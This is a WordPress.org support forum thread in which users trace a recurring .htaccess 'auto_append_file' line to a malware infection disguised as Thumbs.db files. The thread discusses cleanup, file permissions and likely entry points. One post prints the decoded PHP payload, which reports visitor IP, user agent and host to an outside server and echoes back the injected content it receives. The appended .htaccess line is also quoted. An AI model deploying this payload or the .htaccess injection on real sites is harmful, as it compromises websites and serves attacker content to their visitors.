WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Where to start on this .htaccess issue (23 posts)

  1. stubbyd
    Member
    Posted 2 years ago #

    I'm getting the following appear in one of my .htaccess files (it can be one or all three) on a semi-regular basis.

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    When it appears it causes the server to respond with a 500 error. My fix is to remove the line, save and refresh my page view.

    I'm guessing it comes from a plugin or possibly from the theme but don't even know where to begin to track it down. Any suggestions for tracking it down other than disable / re-enable plugins one by one. Because it only happens semi-frequently that process would take me most of a year or longer to complete and we need access to the websites to be available in the meantime.

  2. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I suggest that you try asking your hosts about it.

  3. stubbyd
    Member
    Posted 2 years ago #

    Thanks for the reply.

    I've already been down that route and they advise that something from the blog site is auto changing / updating the htaccess - thus my appearance here :)

  4. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    It's not WordPress, so my guess is that it would be some sort of image handling plugin.

  5. stubbyd
    Member
    Posted 2 years ago #

    And I'm still clueless :)

    From what I can understand, the aspects that handle images are the media uploader part of WP and the following plugins:

    Featured Content Gallery - been there since day 1. This problem is maybe 1mth old.
    Sermon Browser (maybe) - can happily disable this one as it's only a test thing anyway.

    and that's about it - thus my confusion as this is definitely coming from somewhere but where is the issue.

  6. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    WordPress doesn't do anything with Thumbs.db. That's a Windows specific file.

  7. stubbyd
    Member
    Posted 2 years ago #

    But my point is that something in the PHP code - be it a plugin or be it Wp is generating this extra line.

    I never said thumbs.db was a Wp file or a whatever file - I merely copied & pasted the line exactly as is. With the line in it causes a error 500. Without it the websites work just fine.

  8. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    WordPress doesn't do anything with - or relating to - Thumbs.db files.

  9. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    More about thumbs.db files and where they come from.

    http://www.ofzenandcomputing.com/zanswers/98/

    Maybe changing the permissions on the htaccess file would be the answer.

  10. stubbyd
    Member
    Posted 2 years ago #

    OK - I have tried changing the htaccess permissions. Maybe not severe enough though. What is the toughest I can go without disrupting its operational effectiveness?

    As to what / where thumbs.db are / from - thanks but I know.

    What I don't know is why on a *nix based web server with a wordpress install I'm suddenly getting this in my htaccess file:

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    As hinted earlier I have 3 htaccess files and this line will randonly appear in any or all of them. They are in my home directory. They are in my USERDIR directory and they are in my blog directory.

    There are two website URLs running here - one is an ecommerce setup running OSCommerce and the other a blog running under WP. I guess the ecommerce could be generating that line as well but why in the blog directory?

  11. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    What I don't know is why on a *nix based web server with a wordpress install I'm suddenly getting this in my htaccess file:

    Ditto. I've never seen this on a *nix server before. I'm not even sure what it's supposed to do or why someone would want to prepend a script with Thumbs.db.

  12. stubbyd
    Member
    Posted 2 years ago #

    Folks I appreciate the replies - but with all due respect I'm getting nowhere.

    I guess I'll disable certain addons one at a time and see what happens.

  13. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I'm sorry we can't help further but this is totally bizarre and, fwiw, I still think it's a server issue.

  14. stubbyd
    Member
    Posted 2 years ago #

    Oh ok thanks for the responses anyway.

  15. anitramwaju
    Member
    Posted 2 years ago #

    The problem is probably not related to WordPress. I had the same problem (this line added at the end of every .htaccess file causing a 500 error) yesterday on a server with no WordPress on it.

    At the same time, Thumbs.db files appeared in each directory where there was an .htaccess. These Thumbs.db files are not related to Windows in any way but contain PHP code. This code is hided in base64 (actually it's a bit more complicated…) and when decoded looks like

    @error_reporting(0);
    $list = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if((preg_match("/".implode("|", $list)."/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
    } else {
    	@setcookie("stats",md5("stats"),time()+10800);
    	$file = @file_get_contents("http://cacacacacacacacaca.ca/in.php?i=".$_SERVER["REMOTE_ADDR"]
    		."&b=".urlencode($_SERVER["HTTP_USER_AGENT"])
    		."&h=".urlencode($_SERVER["HTTP_HOST"]);
    	if (strstr($file,"!go!")) {
    		$file = explode("!go!", $file);
    		$file = $file[1];
    		echo $file;
    	}
    }

    This code would have been executed if my server accepted the "php_value auto_append_file" in .htaccess which it doesn't and so did the 500 error instead.

  16. stubbyd
    Member
    Posted 2 years ago #

    Interesting - I haven't bothered to look inside the file. Just deleted the line in the htaccess

  17. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Ok - this looks very like a hack.
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Since the hack uses Thumbs.db, it might be especially important to read the last link as it describes hack backdoors disguised as image files.

  18. stubbyd
    Member
    Posted 2 years ago #

    The site was hacked with an automated hack if I recall correctly.

    I'll go through the above posts one by one but I believe we cleared out any "issues" back when. I've used and use the exploit scanner and whilst it throws up queries on some of the plugins it throws them up whether it's a clean install or even if that same plugin is used on one of my own personal blogs.

    So that indicates to me that the scanner is picking up on coding that "could" be used but in these cases isn't. IYSWIM :)

    Anyway, again thank you and I will go through the process .... again :(

  19. sameprob
    Member
    Posted 2 years ago #

    My WordPress site got hit by the same malware and I wanted to share details. The infected files were dated May 7, 2011, about the same time as stubbyd's report.

    My site was running either WordPress 3.1.1 or 3.1.2 at the time (I believe 3.1.2). User account creation is disabled. The site had these plugins installed at the time:

    • Akismet 2.5.3
    • Blackbird Pie 0.5.1 (installed but disabled)
    • FeedBurner FeedSmith 2.3.1
    • Google Analyticator 6.1.3
    • Google XML Sitemaps 3.2.4
    • Hello Dolly 1.6 (installed but disabled)

    There are no CGI scripts or other custom code located on the server - only WordPress. I did have all WordPress files set with ownership by the Apache user (bad practice, I admit).

    In addition to creating the Thumbs.db payload file and appending the PHP reference above to the end of .htaccess, the malware also modified most PHP files in the root WordPress folder (notably not wp-config.php or a couple others) to include an eval() call to its payload wherever it found a <?php open tag. PHP files in WordPress subfolders fortunately weren't modified. Themes and plugins were not infected.

    Even better news is that I can't find any evidence of infection in the WordPress database itself. Simply overwriting all the core WordPress files with stock versions seems to eradicate the malware. I also upgraded WordPress to the latest version (3.1.3) and hardened my file permissions so the Apache user can no longer modify files.

    I'm convinced this is an underpublicized exploit in WordPress or one of the above plugins. If anyone else who got bit can post their WP and plugin versions, it would help narrow it down. I also found a description of this malware on this site, posted in the past week:

    http://www.neubreed.com.au/blog/2011/06/how_clean_after_thumbsdb_wordpress_and_php_auto_append_file_exploit_hack

    I only discovered my site was infected when Google Webmaster tools alerted me, so fortunately major browsers and search engines should be aware of this one by now. Good luck to anyone else who gets bit.

  20. pictureitsolved
    Member
    Posted 2 years ago #

    @stubbyd: have you solved this yet? If not, see the link posted above by @sameprob for how to clean up. It was very helpful for me.

  21. stubbyd
    Member
    Posted 2 years ago #

    As it happens I'd forgotten about this post and for whatever reason I didn't see the response from "sameprob"

    However I did read the stuff supplied via "esmi" and it would appear that I concluded on doing the same as "sameprob".

    Effectively I overwrote all core files (again) and for each plugin that the security scanner said was suspect (a number of them detailed by sameprob) I replaced with fresh versions - since having done that I haven't seen any further repeats of the problem.

  22. fredriley
    Member
    Posted 2 years ago #

    I've just been hit by this same hack, but on my site I only have a test installation of WP and that's protected by a .htaccess file that's not been hacked. The .htaccess that was hacked was in my site web root which is a mystery as the file and web root were set to owner write only. I'm chasing this up with my hosting provider so that they can look at the logs to see where the hackbot got in.

    Looking at my WP installation, the following 3 folders are all set to world write (777), which I'm sure should not be the case:

    wp-admin
    wp-content
    wp-includes

    What permissions should these directories have?

    Fred

  23. fredriley
    Member
    Posted 2 years ago #

    It's probably a sign of madness to reply to your own posts, but I thought I'd better report that the hack culprit was a 2008 installation of phpMyAdmin on my site, and not WP.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags